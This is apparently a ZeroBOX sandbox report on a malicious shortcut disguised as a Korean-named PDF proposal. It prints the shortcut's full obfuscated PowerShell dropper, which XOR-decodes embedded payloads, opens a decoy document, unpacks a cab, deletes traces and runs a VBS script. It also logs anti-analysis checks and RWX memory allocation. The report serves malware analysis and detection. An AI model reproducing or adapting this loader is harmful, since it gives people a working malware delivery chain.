Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 11, 2025, 3:35 p.m.	April 11, 2025, 3:37 p.m.

Size	4.1MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`777b6a02f7a44582c40ddadb82e60ddb`
SHA256	`401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88`
CRC32	`53606C67`
ssdeep	`98304:zC7gKs9RbcvRMN4G1Kyaqxur28/C02Ye9gK9/Nu:zagKs9IWhYYYrbQgK9/s`
Yara	Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "yXRuhXoiFu" C:\Users\test22\AppData\Local\Temp\제안서.pdf.lnk
2560
- cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner*0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear*0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) | <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;" ) )
  2648
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
    2732
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
      2808
    - findstr.exe findstr /i rshell.exe
      2844
  - powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner*0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear*0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) | <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;"
    2908
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\nearby.cab -F:* C:\Users\Public\documents
      2104

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 11, 2025, 3:35 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 11, 2025, 3:35 p.m.			0	0

Command line console output was observed (50 out of 898 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: exist "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" console_handle: 0x00000007	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;" console_handle: 0x00000007	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: Method invocation failed because [System.IO.FileInfo] doesn't contain a method console_handle: 0x00000023	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: At line:1 char:2173 console_handle: 0x0000003b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: + function sister{param($title); <#obviously effectively#>$mystery = $title.sub console_handle: 0x00000047	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: string(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{ console_handle: 0x00000053	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function st console_handle: 0x0000005f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: ir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-O console_handle: 0x0000006b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: bject System.IO.FileStream(<#organization psychological#>$league,<#field region console_handle: 0x00000077	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: #>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grav console_handle: 0x00000083	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: e rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#g console_handle: 0x0000008f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: lass struggle#> $observe=$winner*0x01;<#case full#> $model=New-Object byte[] <# console_handle: 0x0000009b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also pla console_handle: 0x000000a7	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: yer#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#aband console_handle: 0x000000b3	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: on darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor console_handle: 0x000000bf	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: external#>$model[$fear]=$smooth[$fear*0x01] -bxor $policy;$fear++;}<#tribe n't# console_handle: 0x000000cb	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: > set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;} console_handle: 0x000000d7	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: ;function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire console_handle: 0x000000e3	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component console_handle: 0x000000ef	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> retu console_handle: 0x000000fb	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: rn $beauty;};function similar{param($regulation); <#presence ground#>$shot = Sp console_handle: 0x00000107	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: lit-Path $regulation;<#extreme jury#> return $shot;};function researcher{return console_handle: 0x00000113	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: Get-Location;};function reality{<#variation choice#>return $env:Temp;};functio console_handle: 0x0000011f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: n suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result console_handle: 0x0000012b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: #>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = visio console_handle: 0x00000137	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: n -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swea console_handle: 0x00000143	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: r designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function conc console_handle: 0x0000014f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: entration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<# console_handle: 0x0000015b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: loss lawn#> return $accept;};function vision{param($entrance); <#talent certain console_handle: 0x00000167	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: #> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO. console_handle: 0x00000173	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: SearchOption]::AllDirectories) \| <#product wide#>ForEach-Object { <#frame Pales console_handle: 0x0000017f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: tinian#> $era = [System.IO.FileInfo]::new <<<< ($_); <#rapid asleep#> if ($era. console_handle: 0x0000018b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; console_handle: 0x00000197	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar console_handle: 0x000001a3	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -l console_handle: 0x000001af	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: eague <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D console_handle: 0x000001bb	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: 7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge poten console_handle: 0x000001c7	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: tially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $ console_handle: 0x000001d3	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CC console_handle: 0x000001df	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: F -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommen console_handle: 0x000001eb	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: dation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $ console_handle: 0x000001f7	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$per console_handle: 0x00000203	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: mit = <#detailed crazy#>concentration;<#toy variation#>& $permit; console_handle: 0x0000020f	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: + CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept console_handle: 0x0000021b	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: ion console_handle: 0x00000227	1	1
WriteConsoleW April 11, 2025, 3:35 p.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000233	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057d250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057d090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057d090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057d090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057d950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057da90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ddd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 11, 2025, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057dd10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 11, 2025, 3:35 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 166 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0205a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 11, 2025, 3:35 p.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
